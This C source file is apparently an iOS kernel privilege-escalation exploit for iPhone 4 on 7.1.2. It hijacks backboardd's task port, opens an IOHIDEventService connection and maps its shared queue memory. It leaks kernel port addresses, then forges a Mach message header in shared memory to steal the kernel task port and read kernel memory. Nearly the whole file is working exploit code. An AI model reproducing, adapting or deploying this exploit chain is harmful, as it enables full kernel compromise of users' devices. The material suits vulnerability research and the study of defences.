#include "queue.h"

#include "hideventsystem.h"
#include "remote_call.h"
#include "remote_ports.h"
#include "remote_memory.h"
#include <stdlib.h>
#include <stdio.h>
#include <string.h>


#include <mach/mach.h>

#include <pthread.h>

#include <CoreFoundation/CoreFoundation.h>

#include "mig.h"

CFMutableDictionaryRef
IOServiceMatching(const char * name);

extern
const mach_port_t kIOMasterPortDefault;

typedef mach_port_t io_service_t;
typedef mach_port_t io_iterator_t;
typedef mach_port_t io_object_t;
typedef mach_port_t io_connect_t;

typedef	char			io_name_t[128];

#define IO_OBJECT_NULL MACH_PORT_NULL

uint32_t kIOHIDResourceUserClientTypeDevice = 0;

io_service_t
IOServiceGetMatchingService(
                            mach_port_t     masterPort,
                            CFDictionaryRef matching);

kern_return_t
IOServiceGetMatchingServices(
                             mach_port_t     masterPort,
                             CFDictionaryRef matching CF_RELEASES_ARGUMENT,
                             io_iterator_t * existing);

kern_return_t
IOServiceOpen(
              io_service_t    service,
              task_port_t     owningTask,
              uint32_t        type,
              io_connect_t  * connect );

io_object_t
IOIteratorNext(io_iterator_t   iterator );

kern_return_t
IOObjectGetClass(
                 io_object_t     object,
                 io_name_t       className );

kern_return_t
IOObjectRelease(
                io_object_t     object );

IOConnectMapMemory(
                   io_connect_t    connect,
                   uint32_t        memoryType,
                   task_port_t     intoTask,
                   vm_address_t    *atAddress,
                   vm_size_t       *ofSize,
                   uint32_t       options );

IOConnectCallMethod(
                    mach_port_t      connection,            // In
                    uint32_t         selector,              // In
                    const uint64_t  *input,                 // In
                    uint32_t         inputCnt,              // In
                    const void      *inputStruct,           // In
                    size_t           inputStructCnt,        // In
                    uint64_t        *output,                // Out
                    uint32_t        *outputCnt,             // In/Out
                    void            *outputStruct,          // Out
                    size_t          *outputStructCnt);       // In/Out

kern_return_t
IOConnectCallAsyncScalarMethod(
                               mach_port_t      connection,            // In
                               uint32_t         selector,              // In
                               mach_port_t      wake_port,             // In
                               uint64_t        *reference,             // In
                               uint32_t         referenceCnt,          // In
                               const uint64_t  *input,                 // In
                               uint32_t         inputCnt,              // In
                               uint64_t        *output,                // Out
                               uint32_t        *outputCnt);

kern_return_t
IOConnectSetNotificationPort(
                             io_connect_t	connect,
                             uint32_t	type,
                             mach_port_t	port,
                             uintptr_t	reference );

mach_port_t get_tfp0() {
  // get backboardd's task port:
  // on iPhone 4 7.1.2 0x407 names a thread port, 0x1307 a task port
  mach_port_t bbd_task_port = hid_event_queue_exploit(0x1307);
  printf("got a port back: 0x%x\n", bbd_task_port);
  
  kern_return_t err;
  
  printf("doing task remote call\n");
  uint32_t addr = task_remote_call(bbd_task_port, malloc, 1, REMOTE_LITERAL(0x30000));
  printf("addr returned by remote malloc: %x\n", addr);
  
  uint32_t remote_matching = task_remote_call(bbd_task_port, IOServiceMatching, 1, REMOTE_CSTRING("IOHIDEventService"));
  printf("remote matching: 0x%x\n", remote_matching);
  
  uint32_t remote_service = task_remote_call(bbd_task_port, IOServiceGetMatchingService, 2,
                                             REMOTE_LITERAL(0),
                                             REMOTE_LITERAL(remote_matching));
  
  printf("remote service: 0x%x\n", remote_service);
  
  uint32_t remote_conn = 0;
  uint32_t remote_err = task_remote_call(bbd_task_port, IOServiceOpen, 4,
                                         REMOTE_LITERAL(remote_service),
                                         REMOTE_LITERAL(0x1307),
                                         REMOTE_LITERAL(0),
                                         REMOTE_OUT_BUFFER(&remote_conn, sizeof(remote_conn)));
  
  printf("remote err from IOServiceOpen:%x\n", err);
  printf("remote conn: 0x%x\n", remote_conn);
  
  mach_port_t conn = pull_remote_port(bbd_task_port, remote_conn, MACH_MSG_TYPE_COPY_SEND);
  
  printf("got a connection to IOHIDEventService locally :)\n");
  
  
  uint64_t inputScalar[16];
  uint32_t inputScalarCnt = 0;
  
  char inputStruct[4096];
  size_t inputStructCnt = 0;
  
  uint64_t outputScalar[16];
  uint32_t outputScalarCnt = 0;
  
  char outputStruct[4096];
  size_t outputStructCnt = 0;
  
  inputScalar[0] = 0;
  inputScalarCnt = 1;
  
  // create a user device
  err = IOConnectCallMethod(
                            conn,
                            0x0, // open
                            inputScalar,
                            inputScalarCnt,
                            inputStruct,
                            inputStructCnt,
                            outputScalar,
                            &outputScalarCnt,
                            outputStruct,
                            &outputStructCnt);
  
  
  if (err != KERN_SUCCESS){
    printf("IOConnectCall error: %x %s\n", err, mach_error_string(err));
  } else {
    printf("IOConnectCallMethod open worked!\n");
  }
  
  // set a notification port
  mach_port_t notification_port = MACH_PORT_NULL;
  err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &notification_port);
  if (err != KERN_SUCCESS) {
    printf("failed to allocate port\n");
  }
  
  uint64_t ref[8] = {0};
  err = IOConnectSetNotificationPort(conn, 0, notification_port, ref);
  if (err != KERN_SUCCESS) {
    printf("IOConnectSetNotificationPort error: %x %s\n", err, mach_error_string(err));
  } else {
    printf("IOConnectSetNotificationPort worked!\n");
  }
  
  vm_address_t qaddr = 0x41000000;
  vm_size_t qsize = 0x1000;
  
  err = IOConnectMapMemory(conn, 0, mach_task_self(), &qaddr, &qsize, 1);
  if (err != KERN_SUCCESS){
    printf("IOConnectMapMemory failed:0x%x %s\n", err, mach_error_string(err));
    return MACH_PORT_NULL;
  } else {
    printf("mapped queue memory here: %08x\n", addr);
  }
  
  printf("output qsize: %x\n", qsize);
  
  for (int i = 0; i < (qsize)/4; i++) {
    uint32_t* buf = (uint32_t*)qaddr;
    printf("+0x%08x %08x\n", (i*4), buf[i]);
  }
  
  mach_msg_header_t* shm_msg = (mach_msg_header_t*)(qaddr + qsize - 0x18);
  
  err = IOConnectSetNotificationPort(conn, 0, mach_host_self(), ref);
  printf("IOConnectSetNotificationPort error: %x %s\n", err, mach_error_string(err));
  
  err = io_connect_set_notification_port_copy_send(conn, 0, mach_host_self(), ref);
  if (err != KERN_SUCCESS) {
    printf("io_connect_set_notification_port_copy_send error: %x %s\n", err, mach_error_string(err));
  } else {
    printf("io_connect_set_notification_port_copy_send worked!\n");
  }
  
  printf("host port: %08x\n", shm_msg->msgh_remote_port);
  
  uint32_t host_port_kaddr = shm_msg->msgh_remote_port;
  
  // device port?
  mach_port_t master_port = MACH_PORT_NULL;
  err = host_get_io_master(mach_host_self(), &master_port);
  printf("master port: 0x%x\n", master_port);
  
  
  
  
  //err = IOConnectSetNotificationPort(conn, 0, mach_host_self(), ref);
  err = io_connect_set_notification_port_copy_send(conn, 0, master_port, ref);
  if (err != KERN_SUCCESS) {
    printf("io_connect_set_notification_port_copy_send error: %x %s\n", err, mach_error_string(err));
  } else {
    printf("io_connect_set_notification_port_copy_send worked!\n");
  }
  
  printf("master port: %08x\n", shm_msg->msgh_remote_port);
  
  uint32_t master_port_kaddr = shm_msg->msgh_remote_port;
  
  
  io_service_t service = IOServiceGetMatchingService(NULL, IOServiceMatching("IOSurfaceRoot"));
  
  err = io_connect_set_notification_port_copy_send(conn, 0, service, ref);
  if (err != KERN_SUCCESS) {
    printf("io_connect_set_notification_port_copy_send error: %x %s\n", err, mach_error_string(err));
  } else {
    printf("io_connect_set_notification_port_copy_send worked!\n");
  }
  
  printf("iosurfaceroot: %08x\n", shm_msg->msgh_remote_port);
  
  //uint32_t master_port_kaddr = shm_msg->msgh_remote_port;
  
  
  service = IOServiceGetMatchingService(NULL, IOServiceMatching("IOHIDResource"));
  
  err = io_connect_set_notification_port_copy_send(conn, 0, service, ref);
  if (err != KERN_SUCCESS) {
    printf("io_connect_set_notification_port_copy_send error: %x %s\n", err, mach_error_string(err));
  } else {
    printf("io_connect_set_notification_port_copy_send worked!\n");
  }
  
  printf("iohidresource: %08x\n", shm_msg->msgh_remote_port);
  
  // set the real notification port again:
  err = IOConnectSetNotificationPort(conn, 0, notification_port, ref);
  if (err != KERN_SUCCESS) {
    printf("IOConnectSetNotificationPort error: %x %s\n", err, mach_error_string(err));
  } else {
    printf("IOConnectSetNotificationPort worked!\n");
  }
  
  
  // ipc_ports are 0x70 bytes apart, host port is higher, device port is lower
  
  uint32_t saved_bits = shm_msg->msgh_bits;
  uint32_t saved_local_port = shm_msg->msgh_local_port;
  uint32_t saved_msgh_id = shm_msg->msgh_id;
  
  uint32_t port_to_steal = host_port_kaddr - (5*0x70);
  
  shm_msg->msgh_bits = MACH_MSGH_BITS_SET_PORTS(MACH_MSG_TYPE_COPY_SEND, MACH_MSG_TYPE_MAKE_SEND, 0); // remote, local, voucher
  shm_msg->msgh_local_port = port_to_steal;
  shm_msg->msgh_id = 0x12341234;
  
  // wait to receive a message on that port:
  mach_msg_header_t* recv_msg = malloc(0x1000);
  memset(recv_msg, 0, 0x1000);
  
  recv_msg->msgh_local_port = notification_port;
  recv_msg->msgh_size = 0x1000;
  
  err = mach_msg_receive(recv_msg);
  printf("mach_msg_receive: %x %s\n", err, mach_error_string(err));
  
  printf("msgh_id: %x\n", recv_msg->msgh_id);
  printf("remote_port: %x\n", recv_msg->msgh_remote_port);
  
  mach_port_t stolen_port = recv_msg->msgh_remote_port;
  
  // fix up the shm message:
  shm_msg->msgh_bits = saved_bits;
  shm_msg->msgh_local_port = saved_local_port;
  shm_msg->msgh_id = saved_msgh_id;
  
  // destroy the uc:
  mach_port_deallocate(mach_task_self(), conn);
  
  // what type of port did we steal?
  natural_t ktype = 0;
  mach_vm_address_t kaddr = 0;
  err = mach_port_kobject(mach_task_self(), stolen_port, &ktype, &kaddr);
  if (err != KERN_SUCCESS) {
    printf("unable to get mach port ktype\n");
    return MACH_PORT_NULL;
  }
  
  printf("stolen kernel object type: %d\n", ktype);
  
  if (ktype != 2) {
    printf("stolen port isn't an IKOT_TASK\n");
    return MACH_PORT_NULL;
  }
  
  pid_t pid = 0xffffffff;
  err = pid_for_task(stolen_port, &pid);
  if (err != KERN_SUCCESS) {
    printf("unable to get pid for stolen task port\n");
    return MACH_PORT_NULL;
  }
  
  printf("got a task port for pid: %d\n", pid);
  
  uint32_t val = remote_read_32(stolen_port, master_port_kaddr);
  printf("read: 0x%08x from 0x%08x\n", val, master_port_kaddr);
  
  return stolen_port;
}